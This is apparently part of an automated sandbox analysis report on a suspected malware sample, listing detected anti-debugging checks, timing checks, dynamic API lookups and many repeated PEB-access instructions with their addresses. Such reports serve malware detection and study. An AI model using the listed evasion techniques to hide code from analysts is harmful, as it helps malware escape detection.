Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E rdtsc 4_2_014C096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2B60 NtClose,LdrInitializeThunk, 4_2_014C2B60
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00162802 #797,GetCurrentThread,SetThreadDescription,IsDebuggerPresent,RegOpenKeyExW,GetCurrentProcessId,RegCloseKey,ExitProcess, 9_2_00162802
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0014AA8C GetCurrentThreadId,LoadLibraryW,GetProcAddress, 9_2_0014AA8C
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01518158 mov eax, dword ptr fs:[00000030h] 4_2_01518158
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C156 mov eax, dword ptr fs:[00000030h] 4_2_0147C156
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov eax, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov eax, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov ecx, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov eax, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov eax, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486154 mov eax, dword ptr fs:[00000030h] 4_2_01486154
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486154 mov eax, dword ptr fs:[00000030h] 4_2_01486154
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554164 mov eax, dword ptr fs:[00000030h] 4_2_01554164
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554164 mov eax, dword ptr fs:[00000030h] 4_2_01554164
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01540115 mov eax, dword ptr fs:[00000030h] 4_2_01540115
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov ecx, dword ptr fs:[00000030h] 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h] 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h] 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h] 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0124 mov eax, dword ptr fs:[00000030h] 4_2_014B0124
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015461C3 mov eax, dword ptr fs:[00000030h] 4_2_015461C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015461C3 mov eax, dword ptr fs:[00000030h] 4_2_015461C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015561E5 mov eax, dword ptr fs:[00000030h] 4_2_015561E5
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B01F8 mov eax, dword ptr fs:[00000030h] 4_2_014B01F8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C0185 mov eax, dword ptr fs:[00000030h] 4_2_014C0185
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150019F mov eax, dword ptr fs:[00000030h] 4_2_0150019F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150019F mov eax, dword ptr fs:[00000030h] 4_2_0150019F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150019F mov eax, dword ptr fs:[00000030h] 4_2_0150019F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150019F mov eax, dword ptr fs:[00000030h] 4_2_0150019F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h] 4_2_0147A197
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h] 4_2_0147A197
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h] 4_2_0147A197
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01524180 mov eax, dword ptr fs:[00000030h] 4_2_01524180
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01524180 mov eax, dword ptr fs:[00000030h] 4_2_01524180
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153C188 mov eax, dword ptr fs:[00000030h] 4_2_0153C188
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153C188 mov eax, dword ptr fs:[00000030h] 4_2_0153C188
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506050 mov eax, dword ptr fs:[00000030h] 4_2_01506050
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01482050 mov eax, dword ptr fs:[00000030h] 4_2_01482050
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AC073 mov eax, dword ptr fs:[00000030h] 4_2_014AC073
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01504000 mov ecx, dword ptr fs:[00000030h] 4_2_01504000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h] 4_2_0149E016
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h] 4_2_0149E016
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h] 4_2_0149E016
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h] 4_2_0149E016
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516030 mov eax, dword ptr fs:[00000030h] 4_2_01516030
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A020 mov eax, dword ptr fs:[00000030h] 4_2_0147A020
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C020 mov eax, dword ptr fs:[00000030h] 4_2_0147C020
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015020DE mov eax, dword ptr fs:[00000030h] 4_2_015020DE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014880E9 mov eax, dword ptr fs:[00000030h] 4_2_014880E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_0147A0E3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015060E0 mov eax, dword ptr fs:[00000030h] 4_2_015060E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C0F0 mov eax, dword ptr fs:[00000030h] 4_2_0147C0F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C20F0 mov ecx, dword ptr fs:[00000030h] 4_2_014C20F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148208A mov eax, dword ptr fs:[00000030h] 4_2_0148208A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014780A0 mov eax, dword ptr fs:[00000030h] 4_2_014780A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015460B8 mov eax, dword ptr fs:[00000030h] 4_2_015460B8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015460B8 mov ecx, dword ptr fs:[00000030h] 4_2_015460B8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015180A8 mov eax, dword ptr fs:[00000030h] 4_2_015180A8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01528350 mov ecx, dword ptr fs:[00000030h] 4_2_01528350
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A352 mov eax, dword ptr fs:[00000030h] 4_2_0154A352
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov ecx, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0155634F mov eax, dword ptr fs:[00000030h] 4_2_0155634F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152437C mov eax, dword ptr fs:[00000030h] 4_2_0152437C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h] 4_2_014BA30B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h] 4_2_014BA30B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h] 4_2_014BA30B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C310 mov ecx, dword ptr fs:[00000030h] 4_2_0147C310
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A0310 mov ecx, dword ptr fs:[00000030h] 4_2_014A0310
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01558324 mov eax, dword ptr fs:[00000030h] 4_2_01558324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01558324 mov ecx, dword ptr fs:[00000030h] 4_2_01558324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01558324 mov eax, dword ptr fs:[00000030h] 4_2_01558324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01558324 mov eax, dword ptr fs:[00000030h] 4_2_01558324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015243D4 mov eax, dword ptr fs:[00000030h] 4_2_015243D4
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015243D4 mov eax, dword ptr fs:[00000030h] 4_2_015243D4
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h] 4_2_014883C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h] 4_2_014883C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h] 4_2_014883C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h] 4_2_014883C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h] 4_2_0152E3DB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h] 4_2_0152E3DB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E3DB mov ecx, dword ptr fs:[00000030h] 4_2_0152E3DB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h] 4_2_0152E3DB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015063C0 mov eax, dword ptr fs:[00000030h] 4_2_015063C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153C3CD mov eax, dword ptr fs:[00000030h] 4_2_0153C3CD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B63FF mov eax, dword ptr fs:[00000030h] 4_2_014B63FF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0149E3F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0149E3F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0149E3F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A438F mov eax, dword ptr fs:[00000030h] 4_2_014A438F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A438F mov eax, dword ptr fs:[00000030h] 4_2_014A438F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h] 4_2_0147E388
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h] 4_2_0147E388
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h] 4_2_0147E388
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478397 mov eax, dword ptr fs:[00000030h] 4_2_01478397
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478397 mov eax, dword ptr fs:[00000030h] 4_2_01478397
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478397 mov eax, dword ptr fs:[00000030h] 4_2_01478397
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153A250 mov eax, dword ptr fs:[00000030h] 4_2_0153A250
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153A250 mov eax, dword ptr fs:[00000030h] 4_2_0153A250
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0155625D mov eax, dword ptr fs:[00000030h] 4_2_0155625D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486259 mov eax, dword ptr fs:[00000030h] 4_2_01486259
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01508243 mov eax, dword ptr fs:[00000030h] 4_2_01508243
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01508243 mov ecx, dword ptr fs:[00000030h] 4_2_01508243
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A250 mov eax, dword ptr fs:[00000030h] 4_2_0147A250
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484260 mov eax, dword ptr fs:[00000030h] 4_2_01484260
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484260 mov eax, dword ptr fs:[00000030h] 4_2_01484260
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484260 mov eax, dword ptr fs:[00000030h] 4_2_01484260
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147826B mov eax, dword ptr fs:[00000030h] 4_2_0147826B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147823B mov eax, dword ptr fs:[00000030h] 4_2_0147823B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015562D6 mov eax, dword ptr fs:[00000030h] 4_2_015562D6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h] 4_2_014902E1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h] 4_2_014902E1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h] 4_2_014902E1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE284 mov eax, dword ptr fs:[00000030h] 4_2_014BE284
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE284 mov eax, dword ptr fs:[00000030h] 4_2_014BE284
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01500283 mov eax, dword ptr fs:[00000030h] 4_2_01500283
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01500283 mov eax, dword ptr fs:[00000030h] 4_2_01500283
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01500283 mov eax, dword ptr fs:[00000030h] 4_2_01500283
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902A0 mov eax, dword ptr fs:[00000030h] 4_2_014902A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902A0 mov eax, dword ptr fs:[00000030h] 4_2_014902A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov ecx, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488550 mov eax, dword ptr fs:[00000030h] 4_2_01488550
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488550 mov eax, dword ptr fs:[00000030h] 4_2_01488550
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B656A mov eax, dword ptr fs:[00000030h] 4_2_014B656A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B656A mov eax, dword ptr fs:[00000030h] 4_2_014B656A
